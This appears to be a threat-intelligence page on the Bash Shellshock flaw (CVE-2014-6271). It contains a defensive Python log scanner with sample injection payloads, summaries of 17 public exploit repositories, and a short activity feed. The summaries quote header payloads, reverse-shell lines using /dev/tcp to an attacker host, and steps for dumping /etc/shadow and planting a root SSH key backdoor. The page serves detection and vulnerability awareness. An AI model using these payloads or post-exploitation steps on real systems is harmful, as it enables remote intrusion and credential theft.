Shellshock
GNU Bash through 4.3 incorrectly processes trailing commands appended after exported function definitions in environment variable values. When Bash parses a crafted environment variable such as a function definition followed by additional shell commands, it executes the trailing commands during shell startup. This creates an OS command injection condition across privilege boundaries wherever untrusted input can be placed into environment variables before Bash is invoked. Documented attack surfaces include Apache HTTP Server mod_cgi/mod_cgid, OpenSSH sshd ForceCommand configurations, DHCP client script execution, and other contexts where network- or user-controlled data is translated into environment variables and then interpreted by Bash. The issue is widely known as Shellshock. The original fix for CVE-2014-6271 was incomplete, which led to follow-on CVEs including CVE-2014-7169.
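An added example, not part of the original page: a log-review sketch for the Apache CGI surface described above. It flags requests whose Referer or User-Agent value begins with the exported-function prefix `() {`. It assumes the Apache "combined" log format; the log lines, IP addresses and the /cgi-bin/status path are constructed for illustration.

```python
import re

# Combined log format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
# Apache writes a literal quote inside a logged header as \", so a quoted
# field is matched as (?:[^"\\]|\\.)* rather than [^"]*.
_Q = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    rf'"(?P<request>{_Q})" (?P<status>\d{{3}}) \S+ '
    rf'"(?P<referer>{_Q})" "(?P<agent>{_Q})"'
)

# Vulnerable Bash imported an environment value as a function only when the
# value started with "() {". Matching at the start of the header value (with
# tolerant whitespace) avoids flagging text that merely contains "() {".
FUNC_PREFIX = re.compile(r'\s*\(\s*\)\s*\{')


def scan(lines):
    """Return one finding per header field that starts with the prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("referer", "agent"):
            if FUNC_PREFIX.match(m[field]):
                findings.append({
                    "line": lineno,
                    "ip": m["ip"],
                    "field": field,
                    "request": m["request"],
                    "status": int(m["status"]),
                    # A 2xx answer means a handler ran; triage these first.
                    "answered_2xx": m["status"].startswith("2"),
                })
    return findings


# Constructed sample input (documentation IP ranges, harmless echo marker).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 41 "-" "() { :;}; echo; echo probe"',
    '198.51.100.7 - - [25/Sep/2014:10:01:06 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '404 209 "() { ignored; }; echo probe" "curl/7.38.0"',
    # Benign: contains "() {" but not at the start of the header value.
    '192.0.2.33 - - [25/Sep/2014:10:02:00 +0000] "GET /app.js HTTP/1.1" '
    '200 900 "-" "tester (function() { return 1 })"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The combined format does not record the Cookie header or other request headers, so covering those requires a custom log format or inspection at a proxy or WAF.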
Exploits
17 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (31 hidden).
Repository is a small offensive lab project documenting and partially automating compromise of the VulnHub HackSudo Thor VM behind a pfSense firewall. Structure is simple: a long README walkthrough, one pfSense brute-force script, one password wordlist, and one Python automation script for post-exploitation through Metasploit RPC. The README describes the broader attack chain: brute-force pfSense webConfigurator on WAN using default/admin credentials, disable firewall restrictions, exploit Thor via Shellshock (CVE-2014-6271) at /cgi-bin/shell.sh to obtain a Meterpreter/www-data foothold, escalate to user thor through command injection in /home/thor/hammer.sh, then escalate to root via GTFOBins abuse of sudo service. The code itself implements two practical capabilities: (1) scripts/pfsense_brute.py performs CSRF-aware web login brute forcing against http://10.0.2.8/index.php using username admin and a local wordlist; (2) scripts/thor_full_chain.py connects to a locally exposed Metasploit RPC server on 127.0.0.1:55552, attaches to an existing session, drops into a shell, stabilizes it with a PTY, performs the documented privilege-escalation steps, enumerates the system, reads /root/root.txt and /root/proof.txt, dumps /etc/shadow and /etc/passwd, and installs a root SSH authorized_keys backdoor. This is not a standalone end-to-end exploit because initial exploitation of Thor is not implemented in code and instead assumed to already exist as a live Metasploit session; however, the included scripts are functional offensive tooling for credential attack and automated post-exploitation in the described lab.
This repository is a small standalone Python exploit for Shellshock (CVE-2014-6271). It contains one executable script, CVE-2014-6271.py, and a README. The Python script uses requests and colorama, displays a banner, prompts the operator for a target URL, then enters an infinite interactive loop asking for commands to execute. For each command, it builds a classic Shellshock payload in the User-Agent header: '() { :;}; echo; echo; /bin/sh -c ...', sends an HTTP GET request to the supplied target CGI URL, and prints the response body. The exploit capability is straightforward remote command execution against vulnerable Bash-backed CGI endpoints over HTTP. It does not include target discovery, authentication bypass, persistence, or post-exploitation automation; it assumes the operator already knows a reachable CGI endpoint. Structurally, the repository is minimal and purpose-built: one script as the entry point and one README describing Shellshock, installation, and intended use. The code is a real exploit rather than a detector-only script, because it actively executes arbitrary commands and returns output from the target.
This repository is a small Python-based Shellshock (CVE-2014-6271) exploitation/scanning utility. Its structure is simple: a top-level README, and a CVE-2014-6271 subdirectory containing the main scanner, a proxy scraper, a banner/login screen helper, dependency list, and text files for proxies, user agents, and discovered vulnerable URLs. Code review shows only partial implementation of the capabilities advertised in the README. The main exploit logic in CVE-2014-6271/main.py defines a Scanner class that loads proxy.txt and useragent.txt, then probes a supplied target by requesting <base_url>/cgi-bin/. If the HTTP status is 200, 403, or 301, it reports the target as 'possible vulnerable'. This is only a heuristic CGI exposure check, not a definitive Shellshock verification by itself. The README claims additional features such as directory scanning, command execution against discovered CGI endpoints, showing vulnerable URLs, and saving command output to response.txt, but those behaviors are not present in the provided code excerpt. CVE-2014-6271/proxy.py is a support component that scrapes https://free-proxy-list.net/ using requests and BeautifulSoup, extracts IP:port pairs from the HTML table, and writes them to proxy.txt. CVE-2014-6271/loginscreen.py is cosmetic and prints an ANSI-colored banner. requirements.txt lists requests and BeautifulSoup dependencies. useragent.txt is a large static list of browser user-agent strings, likely intended for request randomization, though the shown scanner code does not yet use them. Overall, this is best classified as a proof-of-concept web/network exploit helper for Shellshock reconnaissance rather than a complete weaponized exploit. The repository targets CGI-enabled web servers that may invoke vulnerable Bash environments. The most fingerprintable external endpoint is free-proxy-list.net; target endpoints are user-supplied HTTP URLs with /cgi-bin/ appended.
Repository contains a simple, standalone Python proof-of-concept/exploit for Shellshock (CVE-2014-6271) plus a detailed README.
Structure:
- README.md: Background on Shellshock, affected Bash versions, mitigation, and example curl payloads (including reverse shell via /dev/tcp).
- ShellShock.py: The actual exploit tool.
Exploit behavior (ShellShock.py):
- Uses requests.get() to send an HTTP GET to a user-supplied CGI URL with a crafted header value containing the Shellshock function-import prefix.
- Modes:
  - --test: sends payload "() { :;}; echo; echo 'VULN-SUCCESS'" and checks response body for the marker to indicate likely vulnerability.
  - --command: sends "() { :;}; echo; <cmd>" to execute arbitrary commands and prints the HTTP response body as command output.
  - --reverseshell: sends "() { :;}; bash -c \"bash -i >& /dev/tcp/LHOST/LPORT 0>&1\"" to trigger a reverse shell to the attacker.
- Header injection is configurable via -H/--header (default User-Agent; suggests Referer/Cookie).
Primary capability is unauthenticated remote command execution against web-exposed Bash CGI endpoints on vulnerable systems, with an optional reverse shell callback. The code is operational but basic (no target discovery, no multi-target scanning, no robust output parsing beyond marker matching).
Repository contains a simple Bash proof-of-concept exploit for Shellshock (CVE-2014-6271) targeting web servers that expose CGI scripts executed by vulnerable Bash. Structure: (1) README.md documents usage and options; (2) shellshock_exp.sh is the only code file and the entry point; (3) LICENSE is MIT. The exploit works by sending an HTTP request with a malicious User-Agent header containing a crafted Bash function definition followed by a command execution stub: `() { :; }; ... /bin/bash -c '$COMMAND'`. If the target CGI environment passes the header into Bash on a vulnerable system, Bash executes the appended command, returning output in the HTTP response. The script supports configurable target address (-a), port (-p), CGI path (-f), and command (-c). Default behavior attempts to read `/etc/passwd` from the target to demonstrate remote command execution.
Repository contains a single Python3 exploit script and a README. The exploit targets Shellshock (CVE-2014-6271) in a web/CGI context (e.g., Apache with mod_cgi) by injecting a malicious function definition into the HTTP `User-Agent` header.
Structure & purpose:
- README.md: High-level description of Shellshock, lab links, and example nmap/curl commands for discovery/testing.
- shellshock_exploit.py: Standalone Python script (entry point via `main()`) that:
  1) Validates the target URL returns HTTP 200.
  2) Performs a basic vulnerability check by sending `User-Agent: () { ignored; }; ... /usr/bin/id` and looking for a hardcoded `www-data` id string in the response.
  3) If proceeding, starts a local netcat listener (`nc -lp LPORT`) and sends a second request with a reverse-shell payload: `/bin/bash -i >& /dev/tcp/LHOST/LPORT 0>&1`.
Main exploit capabilities:
- Remote command execution via Shellshock header injection.
- Reverse shell callback to attacker-supplied LHOST/LPORT.
Notable limitations/assumptions:
- The vulnerability check is brittle (expects exact `uid=33(www-data)...` output), so non-Debian/Ubuntu targets or different web user IDs may be misclassified.
- Requires `nc` installed locally and the attacker to be reachable from the target on the chosen port.
This repository is an educational toolkit for demonstrating and exploiting the Shellshock vulnerability (CVE-2014-6271) in Bash. The structure includes a main exploit script (exploit.sh), a Docker Compose file for setting up a vulnerable lab environment, a README.md with detailed instructions and background, and supporting files (payloads.txt, screenshots, demo.gif). The exploit.sh script is intended to automate exploitation by sending HTTP requests with malicious headers (such as User-Agent) to CGI endpoints, triggering remote code execution via Bash. The README provides example payloads, usage instructions, and defensive recommendations. The exploit targets CGI-enabled web servers running vulnerable versions of Bash, and demonstrates both command execution and reverse shell capabilities. The code is a proof-of-concept and is not weaponized, but provides a clear demonstration of the vulnerability and its exploitation process.
This repository contains a single Python script, 'shellshock.py', which is an exploit for the Shellshock vulnerability (CVE-2014-6271) in GNU Bash. The script first checks if a given URL is vulnerable by sending HTTP requests with specially crafted headers that trigger the vulnerability. If the target is vulnerable, the script provides a non-interactive shell by allowing the user to input commands, which are base64-encoded, sent via HTTP headers, decoded, and executed on the target server using Bash. The script targets web servers running CGI scripts that invoke a vulnerable version of Bash. The main attack vector is network-based, exploiting HTTP headers such as User-Agent, Referer, and Cookie. The script requires the attacker to supply a target URL as a command-line argument. Notable endpoints include the target URL, and the use of '/usr/bin/base64' and '/bin/bash' on the target system to process and execute commands.
This repository contains a Python exploit script (CVE-2014-6271.py) targeting the Shellshock vulnerability (CVE-2014-6271) in GNU Bash. The exploit is designed to attack web servers running CGI scripts that invoke a vulnerable version of Bash. It works by sending specially crafted HTTP(S) requests to one or more CGI endpoints, injecting a Bash payload via HTTP headers (User-Agent, Cookie, Referer) that triggers remote code execution. The payload establishes a reverse shell from the target to the attacker's machine, providing an interactive shell if successful. The script supports both HTTP and HTTPS, custom CGI paths, and optional proxying. The repository also includes a README with usage instructions and a LICENSE file. The main entry point is CVE-2014-6271.py, which requires Python 3, pwntools, and requests. The exploit is operational, providing a working reverse shell payload, and is not part of a larger framework.
This repository is a demonstration and exploitation environment for CVE-2014-6271 (Shellshock), a critical vulnerability in GNU Bash that allows remote code execution via specially crafted environment variables, typically through CGI scripts on web servers. The repository includes a Dockerfile to build a vulnerable Ubuntu 12.04 environment with Apache and a CGI Bash script ('vulnerable'). The main exploit script, 'exp_deface.sh', sends a malicious HTTP request to the CGI endpoint, exploiting Shellshock to overwrite the web root index.html file, effectively defacing the site. The README provides detailed instructions for building the environment, running the vulnerable service, and exploiting it both manually (to read /etc/passwd) and via the provided script (to deface the site). The main attack vector is network-based, targeting the HTTP CGI endpoint. The repository is structured for educational and demonstration purposes, with clear separation between setup (Dockerfile, main.sh), the vulnerable service (vulnerable, index.html), and the exploit (exp_deface.sh).
This repository contains a single Python script, 'exploit.py', which is an exploit for the Shellshock vulnerability (CVE-2014-6271) affecting CGI-enabled web servers using vulnerable versions of GNU Bash. The script provides an interactive shell-like interface, allowing the user to send arbitrary commands to a specified target URL (e.g., http://10.10.14.24/cgi-bin/test.cgi). It does so by injecting commands into the 'User-Agent' HTTP header using the Shellshock payload format. The script expects the target URL as a command-line argument and prints usage instructions if not provided. The only external dependency is the 'requests' library. The exploit is operational and allows for arbitrary command execution on the vulnerable server, returning the output to the user. The repository is straightforward, containing only the exploit script with no additional files or documentation.
This repository contains a single Python script, 'ris.py', which is an interactive exploit for CVE-2014-6271 (Shellshock). The script targets web servers running CGI scripts that invoke a vulnerable version of GNU Bash. It works by sending HTTP GET requests to a specified CGI endpoint, injecting a malicious payload into a user-specified HTTP header. The payload leverages the Shellshock vulnerability to execute arbitrary shell commands on the server. The script first checks if the target is vulnerable by sending a test command, then provides an interactive shell-like interface for the attacker to run further commands. The script requires the user to specify the target domain/IP, CGI path, and the HTTP header to use for injection. The only file in the repository is the exploit script itself, written in Python, and it is fully operational for exploitation of vulnerable targets.
This repository contains a Python proof-of-concept exploit for CVE-2014-6271 (Shellshock), targeting vulnerable CGI scripts that invoke Bash. The main file, 'shellpoc.py', takes three arguments: the target host, the vulnerable CGI path, and the attacker's host/IP and port (e.g., 10.10.10.1/4444). The script crafts an HTTP GET request to the specified CGI endpoint, injecting a Bash reverse shell payload via a custom HTTP header. If the target is vulnerable, it will execute the payload and connect back to the attacker's machine, providing a shell. The README provides usage instructions and an example. The exploit is operational, requiring a vulnerable CGI endpoint and a listening attacker machine. No hardcoded endpoints are present; all are supplied at runtime.
This repository contains a Python exploit script (exploit.py) targeting the Shellshock vulnerability (CVE-2014-6271) in GNU Bash versions 1.14 through 4.3. The exploit abuses the User-Agent HTTP header to inject a Bash command that opens a reverse shell from the vulnerable server to the attacker's machine. The script requires the attacker to specify the target IP, vulnerable URI, attacker's IP, and port for the reverse shell. The README provides usage instructions and references the CVE. The exploit is operational, providing a working reverse shell payload, and is not part of a larger framework. The main attack vector is network-based, targeting web servers with vulnerable CGI scripts. The endpoints involved are the target's HTTP/HTTPS interface and the attacker's TCP listener.
This repository provides a Dockerized vulnerable environment for demonstrating and exploiting the Shellshock (CVE-2014-6271) vulnerability in Bash. The structure includes a Dockerfile to build an Apache web server with a CGI Bash script ('vulnerable') placed at /usr/lib/cgi-bin/vulnerable, and an index.html page indicating the system is intentionally vulnerable. The main exploit script, 'exploit-deface.sh', is a Bash script that sends a crafted HTTP request to the CGI endpoint, exploiting Shellshock via the User-Agent header to execute arbitrary Bash commands on the server. The provided payload overwrites the web root's index.html file, effectively defacing the site. The README details usage, exploitation methods, and background on Shellshock, including other possible attack vectors (OpenSSH, DHCP, qmail, IBM HMC). The repository is intended for educational and testing purposes, allowing users to safely experiment with the Shellshock exploit in a controlled environment. No detection scripts are present; the focus is on exploitation and demonstration.
This repository contains a Python exploit (shellshock.py) for CVE-2014-6271, also known as Shellshock, which targets vulnerable Bash versions (<4.3) on web servers running CGI scripts. The exploit works by sending a specially crafted HTTP request to a CGI endpoint (commonly under /cgi-bin/) with a malicious payload in HTTP headers (User-Agent, Cookie, Referer). This payload leverages the Shellshock vulnerability to execute arbitrary commands—in this case, spawning a reverse shell that connects back to the attacker's machine (LHOST:LPORT). The script supports both HTTP and HTTPS, attempting multiple TLS versions for SSL connections. The README provides usage instructions, configuration requirements, and example scenarios. The repository structure is simple, with one main exploit script and a README. The exploit is operational, requiring the attacker to set up a listener and supply the target URL, their own IP, and port. No detection or fake code is present; the exploit is functional and directly targets the vulnerability.
This repository is a Python-based Proof of Concept (PoC) exploit for CVE-2014-6271, also known as Shellshock, a critical vulnerability in GNU Bash (<= 4.3) that allows remote code execution via specially crafted environment variables. The main file, CVE-2014-6271.py, provides both scanning and exploitation capabilities. It can test single or multiple URLs (from a file) for vulnerability by injecting a test string into HTTP headers (User-Agent, Referer, Cookie) targeting common CGI script paths. If a target is found vulnerable, the script can deliver a Bash reverse shell payload, connecting back to the attacker's specified host and port. The exploit also includes a listener component to catch the reverse shell. The code uses several third-party Python libraries for user interface and shell management. The README.md provides background on the vulnerability and a disclaimer. The requirements.txt lists all necessary Python dependencies. No hardcoded IPs or domains are present; the script is designed for flexible targeting by the user. The overall structure is typical for a PoC exploit, with clear separation between scanning, exploitation, and listener logic.
Recent activity
57 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Shellshock is referenced as an example of a vulnerability for which an AI-driven honeypot could be configured to simulate a target or respond to exploit attempts.
Shellshock: a Bash vulnerability on Linux/Unix systems enabling command injection/remote code execution in certain contexts.
A critical remote code execution vulnerability in GNU Bash, known as Shellshock.
Shellshock (Bash environment variable command injection) targeted at scale as part of the campaign’s broad vulnerability scanning.